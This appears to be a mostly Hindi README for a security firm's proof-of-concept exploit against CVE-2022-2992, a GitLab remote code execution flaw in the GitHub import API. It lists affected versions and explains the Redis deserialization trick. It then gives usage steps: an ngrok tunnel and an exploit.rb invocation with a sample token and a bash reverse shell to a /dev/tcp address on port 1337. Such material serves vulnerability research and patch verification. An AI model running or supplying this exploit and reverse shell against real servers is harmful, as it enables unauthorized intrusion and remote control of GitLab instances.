
A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.
विवरण: यह एक प्रमाणित उपयोगकर्ता को GitHub से आयात API एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।
प्रभावित संस्करण: 11.10 से 15.1.6 से पहले के सभी संस्करण, 15.2 से 15.2.4, 15.3 से 15.3.2
स्थिर संस्करण: 15.3.2
शोधकर्ता: vakzz
राइट-अप लिंक: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST CVE लिंक: https://nvd.nist.gov/vuln/detail/CVE-2022-2992
एक प्रमाणित उपयोगकर्ता Github से Gitlab में एक रिपॉजिटरी आयात कर सकता है। कोई व्यक्ति हमलावर के नियंत्रक सर्वर से आयात करने का प्रयास कर सकता है, जो नेस्टेड default_branch में एक Redis के सीरियलाइज़ेशन प्रोटोकॉल ऑब्जेक्ट के साथ उत्तर देता है, जिससे Gitlab इस ऑब्जेक्ट को redis पर कैश करता है और redis इसे डीसीरियलाइज़ करके पेलोड निष्पादित करने के लिए ट्रिगर करता है।
किसी को एक व्यक्तिगत एक्सेस टोकन की आवश्यकता होगी
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567 # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload
